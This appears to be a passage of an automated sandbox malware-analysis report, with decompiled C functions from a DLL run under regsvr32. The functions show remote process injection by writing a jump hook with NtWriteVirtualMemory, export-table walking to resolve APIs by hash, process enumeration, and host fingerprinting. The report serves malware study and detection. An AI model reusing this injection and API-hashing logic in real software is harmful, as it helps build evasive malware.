                            control_flow_graph 167 1000cb77-1000cb90 call 1000c4ce 170 1000cb96-1000cba4 call 1000c6c0 167->170 171 1000cc69-1000cc70 167->171 170->171 178 1000cbaa-1000cbe1 memset 170->178 172 1000cc80-1000cc87 171->172 173 1000cc72-1000cc79 FreeLibrary 171->173 175 1000cca3-1000cca9 172->175 176 1000cc89-1000cca2 call 1000861a 172->176 173->172 176->175 178->171 183 1000cbe7-1000cc27 NtProtectVirtualMemory 178->183 184 1000cc67 183->184 185 1000cc29-1000cc44 NtWriteVirtualMemory 183->185 184->171 185->184 186 1000cc46-1000cc65 NtProtectVirtualMemory 185->186 186->171 186->184
                            C-Code - Quality: 93%
                            			E1000CB77(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				void* _v568;
				void _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t32;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t39;
				intOrPtr _t43;
				void* _t63;
				long _t65;
				void* _t70;
				void** _t73;
				void* _t74;

				_t73 = __edx;
				_t63 = __ecx;
				_t74 = 0;
				if(E1000C4CE(__ecx, __edx, __edx, 0) != 0) {
					_t39 = E1000C6C0( *((intOrPtr*)(__edx)), _a4); // executed
					_t74 = _t39;
					if(_t74 != 0) {
						memset( &_v744, 0, 0x2cc);
						_v744 = 0x10002;
						_push( &_v744);
						_t43 =  *0x1001e684; // 0x2e0faa0
						_push(_t73[1]);
						if( *((intOrPtr*)(_t43 + 0xa8))() != 0) {
							_t70 = _v568;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t65 = 5;
							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
							_v8 = _t65;
							_v16 = _t70;
							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v568,  &_v24, _t65,  &_v8) < 0) {
								L6:
								_t74 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				_t32 =  *0x1001e77c; // 0x0
				if(_t32 != 0) {
					FreeLibrary(_t32);
					 *0x1001e77c =  *0x1001e77c & 0x00000000;
				}
				_t33 =  *0x1001e784; // 0x0
				if(_t33 != 0) {
					_t35 =  *0x1001e684; // 0x2e0faa0
					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
					E1000861A(0x1001e784, 0xfffffffe);
				}
				return _t74;
			}
























                            0x1000cb83
                            0x1000cb85
                            0x1000cb87
                            0x1000cb90
                            0x1000cb9b
                            0x1000cba0
                            0x1000cba4
                            0x1000cbb8
                            0x1000cbc0
                            0x1000cbd0
                            0x1000cbd1
                            0x1000cbd6
                            0x1000cbe1
                            0x1000cbe7
                            0x1000cbef
                            0x1000cbfd
                            0x1000cc03
                            0x1000cc04
                            0x1000cc10
                            0x1000cc17
                            0x1000cc27
                            0x1000cc67
                            0x1000cc67
                            0x1000cc46
                            0x1000cc46
                            0x1000cc65
                            0x00000000
                            0x00000000
                            0x1000cc65
                            0x1000cc27
                            0x1000cbe1
                            0x1000cba4
                            0x1000cc69
                            0x1000cc70
                            0x1000cc73
                            0x1000cc79
                            0x1000cc79
                            0x1000cc80
                            0x1000cc87
                            0x1000cc8a
                            0x1000cc8f
                            0x1000cc9c
                            0x1000cca2
                            0x1000cca9

                            APIs
                              • Part of subcall function 1000C4CE: LoadLibraryW.KERNEL32 ref: 1000C5C6
                              • Part of subcall function 1000C4CE: memset.MSVCRT ref: 1000C605
                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73
                              • Part of subcall function 1000C6C0: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
                              • Part of subcall function 1000C6C0: RegisterClassExA.USER32 ref: 1000C785
                              • Part of subcall function 1000C6C0: CreateWindowExA.USER32 ref: 1000C7B0
                              • Part of subcall function 1000C6C0: DestroyWindow.USER32 ref: 1000C7BB
                              • Part of subcall function 1000C6C0: UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
                            • memset.MSVCRT ref: 1000CBB8
                            • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
                            • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
                            • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$DestroyFreeLoadRegisterSectionUnregisterWrite
                            • String ID:
                            • API String ID: 317994034-0
                            • Opcode ID: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
                            • Instruction ID: ec983c159b6771507b2e65583ae913044cb7e5fe8140f97fdbe63d1be5c924e3
                            • Opcode Fuzzy Hash: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
                            • Instruction Fuzzy Hash: 1E310C76A00219AFFB01DFA5CD89F9EB7B8EF08790F114165F504D61A4D771EE448B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000ABA3, Relevance: 7.6, APIs: 5, Instructions: 65processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 187 1000aba3-1000abc7 CreateToolhelp32Snapshot 188 1000ac38-1000ac3e 187->188 189 1000abc9-1000abf2 memset Process32First 187->189 190 1000ac02-1000ac13 call 1000ccc0 189->190 191 1000abf4-1000ac00 189->191 195 1000ac15-1000ac26 Process32Next 190->195 196 1000ac28-1000ac35 CloseHandle 190->196 191->188 195->190 195->196 196->188
                            C-Code - Quality: 100%
                            			E1000ABA3(intOrPtr __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				signed int _t14;
				signed int _t15;
				void* _t22;
				intOrPtr _t28;
				void* _t31;
				intOrPtr _t33;
				void* _t40;
				void* _t42;

				_t33 = __ecx;
				_t31 = __edx; // executed
				_t14 = CreateToolhelp32Snapshot(2, 0);
				_t42 = _t14;
				_t15 = _t14 | 0xffffffff;
				if(_t42 != _t15) {
					memset( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t42,  &_v304) != 0) {
						while(1) {
							_t22 = E1000CCC0(_t33,  &_v308, _t31); // executed
							_t40 = _t22;
							if(_t40 == 0) {
								break;
							}
							_t33 =  *0x1001e684; // 0x2e0faa0
							if(Process32Next(_t42,  &_v308) != 0) {
								continue;
							}
							break;
						}
						CloseHandle(_t42);
						_t15 = 0 | _t40 == 0x00000000;
					} else {
						_t28 =  *0x1001e684; // 0x2e0faa0
						 *((intOrPtr*)(_t28 + 0x30))(_t42);
						_t15 = 0xfffffffe;
					}
				}
				return _t15;
			}













                            0x1000aba3
                            0x1000abbb
                            0x1000abbd
                            0x1000abc0
                            0x1000abc2
                            0x1000abc7
                            0x1000abd6
                            0x1000abde
                            0x1000abf2
                            0x1000ac02
                            0x1000ac08
                            0x1000ac0d
                            0x1000ac13
                            0x00000000
                            0x00000000
                            0x1000ac15
                            0x1000ac26
                            0x00000000
                            0x00000000
                            0x00000000
                            0x1000ac26
                            0x1000ac2e
                            0x1000ac35
                            0x1000abf4
                            0x1000abf4
                            0x1000abfa
                            0x1000abff
                            0x1000abff
                            0x1000abf2
                            0x1000ac3e

                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 1000ABBD
                            • memset.MSVCRT ref: 1000ABD6
                            • Process32First.KERNEL32(00000000,?), ref: 1000ABED
                            • Process32Next.KERNEL32(00000000,?), ref: 1000AC21
                            • CloseHandle.KERNEL32(00000000), ref: 1000AC2E
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32memset
                            • String ID:
                            • API String ID: 1267121359-0
                            • Opcode ID: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
                            • Instruction ID: 824b075522648d78722121d86b555edf1df252a9305654497386a44dc5d3d608
                            • Opcode Fuzzy Hash: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
                            • Instruction Fuzzy Hash: B11191732043556BF710DB68DC89E9F37ECEB863A0F560A29F624CB181EB30D9058762
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000DFAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 197 1000dfad-1000dfc4 198 1000e021 197->198 199 1000dfc6-1000dfee 197->199 201 1000e023-1000e027 198->201 199->198 200 1000dff0-1000e013 call 1000c379 call 1000d400 199->200 206 1000e015-1000e01f 200->206 207 1000e028-1000e03f 200->207 206->198 206->200 208 1000e041-1000e049 207->208 209 1000e095-1000e097 207->209 208->209 210 1000e04b 208->210 209->201 211 1000e04d-1000e053 210->211 212 1000e063-1000e074 211->212 213 1000e055-1000e057 211->213 215 1000e076-1000e077 212->215 216 1000e079-1000e085 LoadLibraryA 212->216 213->212 214 1000e059-1000e061 213->214 214->211 214->212 215->216 216->198 217 1000e087-1000e091 GetProcAddress 216->217 217->198 218 1000e093 217->218 218->201
                            C-Code - Quality: 100%
                            			E1000DFAD(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E1000D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























                            0x1000dfb6
                            0x1000dfb8
                            0x1000dfbb
                            0x1000dfbe
                            0x1000dfc4
                            0x1000e021
                            0x00000000
                            0x1000e021
                            0x1000dfc6
                            0x1000dfd1
                            0x1000dfd4
                            0x1000dfd9
                            0x1000dfde
                            0x1000dfe1
                            0x1000dfe3
                            0x1000dfe6
                            0x1000dfe9
                            0x1000dfee
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x1000dff0
                            0x1000dff0
                            0x1000e002
                            0x1000e00f
                            0x1000e013
                            0x00000000
                            0x00000000
                            0x1000e015
                            0x1000e018
                            0x1000e019
                            0x1000e01f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x1000e01f
                            0x1000e036
                            0x1000e03b
                            0x1000e03f
                            0x00000000
                            0x1000e04b
                            0x1000e04b
                            0x1000e04d
                            0x1000e04d
                            0x1000e053
                            0x00000000
                            0x00000000
                            0x1000e059
                            0x1000e05d
                            0x1000e061
                            0x00000000
                            0x00000000
                            0x00000000
                            0x1000e061
                            0x1000e067
                            0x1000e06f
                            0x1000e074
                            0x1000e077
                            0x1000e077
                            0x1000e079
                            0x1000e07d
                            0x1000e085
                            0x00000000
                            0x00000000
                            0x1000e089
                            0x1000e091
                            0x00000000
                            0x00000000
                            0x00000000
                            0x1000e091

                            APIs
                            • LoadLibraryA.KERNEL32(.dll), ref: 1000E07D
                            • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 1000E089
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: .dll
                            • API String ID: 2574300362-2738580789
                            • Opcode ID: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
                            • Instruction ID: 6da95daea6e89431fe10e6910c52a9851ea62cfcad36df982cd2ab94b172e300
                            • Opcode Fuzzy Hash: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
                            • Instruction Fuzzy Hash: F631E431A002998BEB54CFA9C8847AEBBF5EF44384F24446DD905E7349D770ED81C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000B7A8, Relevance: 9.1, APIs: 6, Instructions: 83stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 94%
                            			E1000B7A8(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				GetComputerNameW( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E100095E1(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E100085D5( &_v16);
				_t33 = E1000C392(_t43);
				E10009640( &(_t43[E1000C392(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E1000C392(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E1000D400(_t43, E1000C392(_t43) + _t40, 0);
			}















                            0x1000b7a8
                            0x1000b7b1
                            0x1000b7bd
                            0x1000b7c3
                            0x1000b7c5
                            0x1000b7cd
                            0x1000b7e0
                            0x1000b7ef
                            0x1000b7fa
                            0x1000b807
                            0x1000b821
                            0x1000b826
                            0x1000b828
                            0x1000b82f
                            0x1000b83f
                            0x1000b850
                            0x1000b85a
                            0x1000b862
                            0x1000b869
                            0x1000b86c
                            0x1000b889

                            APIs
                            • memset.MSVCRT ref: 1000B7C5
                            • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 1000B7E0
                            • lstrcpynW.KERNEL32(?,?,00000100), ref: 1000B7EF
                            • GetVolumeInformationW.KERNEL32(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000B821
                              • Part of subcall function 10009640: _vsnwprintf.MSVCRT ref: 1000965D
                            • lstrcatW.KERNEL32 ref: 1000B85A
                            • CharUpperBuffW.USER32(?,00000000), ref: 1000B86C
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
                            • String ID:
                            • API String ID: 3410906232-0
                            • Opcode ID: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
                            • Instruction ID: 180e092026911c17520c8b5fa365ce7934641c9957428f094d539ad927535ab9
                            • Opcode Fuzzy Hash: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
                            • Instruction Fuzzy Hash: 9C2171B6900218BFE714DBA4CC8AFAF77BCEB44250F108169F505D6185EA75AF448B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000CA25, Relevance: 4.6, APIs: 3, Instructions: 120threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 236 1000ca25-1000ca45 call 1000c8fd 239 1000cb73-1000cb76 236->239 240 1000ca4b-1000ca6c call 1000a86d 236->240 243 1000ca72-1000ca74 240->243 244 1000cb63-1000cb72 call 1000861a 240->244 245 1000cb51-1000cb61 call 1000861a 243->245 246 1000ca7a 243->246 244->239 245->244 248 1000ca7d-1000ca7f 246->248 251 1000cb42-1000cb4b 248->251 252 1000ca85-1000ca9b call 1000ae66 248->252 251->243 251->245 256 1000cb00-1000cb04 252->256 257 1000ca9d-1000cab0 call 1000cb77 252->257 258 1000cb06-1000cb08 256->258 259 1000cb2f-1000cb3c 256->259 257->256 264 1000cab2-1000caca 257->264 261 1000cb19-1000cb29 258->261 262 1000cb0a-1000cb10 258->262 259->248 259->251 261->259 262->261 264->256 267 1000cacc-1000cae7 GetLastError ResumeThread 264->267 268 1000cae9-1000caf4 267->268 269 1000cafc-1000cafd CloseHandle 267->269 271 1000caf6 268->271 272 1000caf7 268->272 269->256 271->272 272->269
                            C-Code - Quality: 89%
                            			E1000CA25(intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t54;
				intOrPtr _t57;
				long _t61;
				intOrPtr _t62;
				signed int _t65;
				signed int _t68;
				signed int _t82;
				void* _t85;
				char _t86;

				_v8 = _v8 & 0x00000000;
				_v20 = __edx;
				_t65 = 0;
				_t37 = E1000C8FD( &_v8);
				_t86 = _t37;
				_v24 = _t86;
				_t87 = _t86;
				if(_t86 == 0) {
					return _t37;
				}
				_t38 =  *0x1001e688; // 0x2d90590
				E1000A86D( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t87);
				_t82 = _v8;
				_t68 = 0;
				_v16 = 0;
				if(_t82 == 0) {
					L20:
					E1000861A( &_v24, 0);
					return _t65;
				}
				while(_t65 == 0) {
					while(_t65 == 0) {
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t45 = E1000AE66( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
						_t92 = _t45;
						if(_t45 >= 0) {
							_t54 = E1000CB77(E10005CEC,  &_v40, _t92, _v20); // executed
							if(_t54 != 0) {
								_t57 =  *0x1001e684; // 0x2e0faa0
								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
								if(_t85 != 0) {
									GetLastError();
									_t61 = ResumeThread(_v36);
									_t62 =  *0x1001e684; // 0x2e0faa0
									if(_t61 != 0) {
										_push(0xea60);
										_push(_t85);
										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
											_t65 = _t65 + 1;
										}
										_t62 =  *0x1001e684; // 0x2e0faa0
									}
									CloseHandle(_t85);
								}
							}
						}
						if(_v40 != 0) {
							if(_t65 == 0) {
								_t52 =  *0x1001e684; // 0x2e0faa0
								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
							}
							_t48 =  *0x1001e684; // 0x2e0faa0
							 *((intOrPtr*)(_t48 + 0x30))(_v36);
							_t50 =  *0x1001e684; // 0x2e0faa0
							 *((intOrPtr*)(_t50 + 0x30))(_v40);
						}
						_t68 = _v16;
						_t47 = _v12 + 1;
						_v12 = _t47;
						if(_t47 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t82 = _v8;
					_t68 = _t68 + 1;
					_v16 = _t68;
					if(_t68 < _t82) {
						continue;
					} else {
						break;
					}
					do {
						goto L19;
					} while (_t82 != 0);
					goto L20;
				}
				L19:
				E1000861A(_t86, 0xfffffffe);
				_t86 = _t86 + 4;
				_t82 = _t82 - 1;
			}



























                            0x1000ca2b
                            0x1000ca34
                            0x1000ca37
                            0x1000ca39
                            0x1000ca3e
                            0x1000ca40
                            0x1000ca43
                            0x1000ca45
                            0x1000cb76
                            0x1000cb76
                            0x1000ca4b
                            0x1000ca5d
                            0x1000ca62
                            0x1000ca65
                            0x1000ca67
                            0x1000ca6c
                            0x1000cb63
                            0x1000cb69
                            0x00000000
                            0x1000cb72
                            0x1000ca72
                            0x1000ca7d
                            0x1000ca8a
                            0x1000ca8e
                            0x1000ca8f
                            0x1000ca90
                            0x1000ca94
                            0x1000ca99
                            0x1000ca9b
                            0x1000caa8
                            0x1000cab0
                            0x1000cabb
                            0x1000cac6
                            0x1000caca
                            0x1000cacc
                            0x1000cada
                            0x1000cae2
                            0x1000cae7
                            0x1000cae9
                            0x1000caee
                            0x1000caf4
                            0x1000caf6
                            0x1000caf6
                            0x1000caf7
                            0x1000caf7
                            0x1000cafd
                            0x1000cafd
                            0x1000caca
                            0x1000cab0
                            0x1000cb04
                            0x1000cb08
                            0x1000cb0a
                            0x1000cb13
                            0x1000cb13
                            0x1000cb19
                            0x1000cb21
                            0x1000cb24
                            0x1000cb2c
                            0x1000cb2c
                            0x1000cb32
                            0x1000cb35
                            0x1000cb36
                            0x1000cb3c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x1000cb3c
                            0x1000cb42
                            0x1000cb45
                            0x1000cb46
                            0x1000cb4b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x1000cb51
                            0x00000000
                            0x00000000
                            0x00000000
                            0x1000cb51
                            0x1000cb51
                            0x1000cb54
                            0x1000cb5a
                            0x1000cb5e

                            APIs
                              • Part of subcall function 1000AE66: memset.MSVCRT ref: 1000AE85
                              • Part of subcall function 1000AE66: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5
                              • Part of subcall function 1000CB77: memset.MSVCRT ref: 1000CBB8
                              • Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
                              • Part of subcall function 1000CB77: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
                              • Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
                              • Part of subcall function 1000CB77: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73
                            • GetLastError.KERNEL32(?,00000001), ref: 1000CACC
                            • ResumeThread.KERNEL32(?,?,00000001), ref: 1000CADA
                            • CloseHandle.KERNEL32(00000000,?,00000001), ref: 1000CAFD
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: MemoryVirtual$Protectmemset$CloseCreateErrorFreeHandleLastLibraryProcessResumeThreadWrite
                            • String ID:
                            • API String ID: 1274669455-0
                            • Opcode ID: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
                            • Instruction ID: 8d942f140de3fd5d428a133cfbe882c53197cdce90259c44b1bbe97365db357f
                            • Opcode Fuzzy Hash: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
                            • Instruction Fuzzy Hash: AF417E31A00319AFEB01DFA8C985EAE77F9FF58390F124168F501E7265DB30AE058B51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000B998, Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 273 1000b998-1000b9b8 GetTokenInformation 274 1000b9ba-1000b9c3 GetLastError 273->274 275 1000b9fe 273->275 274->275 276 1000b9c5-1000b9d5 call 10008604 274->276 277 1000ba00-1000ba04 275->277 280 1000b9d7-1000b9d9 276->280 281 1000b9db-1000b9ee GetTokenInformation 276->281 280->277 281->275 282 1000b9f0-1000b9fc call 1000861a 281->282 282->280
                            C-Code - Quality: 86%
                            			E1000B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E10008604(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E1000861A( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










                            0x1000b99b
                            0x1000b99c
                            0x1000b9a3
                            0x1000b9ab
                            0x1000b9af
                            0x1000b9b8
                            0x1000b9fe
                            0x1000b9fe
                            0x1000b9c5
                            0x1000b9cd
                            0x1000b9cf
                            0x1000b9d5
                            0x1000b9ee
                            0x00000000
                            0x1000b9f0
                            0x1000b9f5
                            0x00000000
                            0x1000b9fb
                            0x1000b9d7
                            0x1000b9d7
                            0x1000b9d7
                            0x1000b9d7
                            0x1000b9d5
                            0x1000ba04

                            APIs
                            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
                            • GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA
                              • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9E9
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: InformationToken$AllocErrorHeapLast
                            • String ID:
                            • API String ID: 4258577378-0
                            • Opcode ID: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
                            • Instruction ID: 0e837ad5d344672522dd0af1a739acbaf95446ba78b21159f473d30cfb6f5d1d
                            • Opcode Fuzzy Hash: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
                            • Instruction Fuzzy Hash: 8E01A27260066ABFAB24DFA6CC89D8F7FECEB456E17120225F605D3124E630DE00C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000AE66, Relevance: 3.0, APIs: 2, Instructions: 46processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
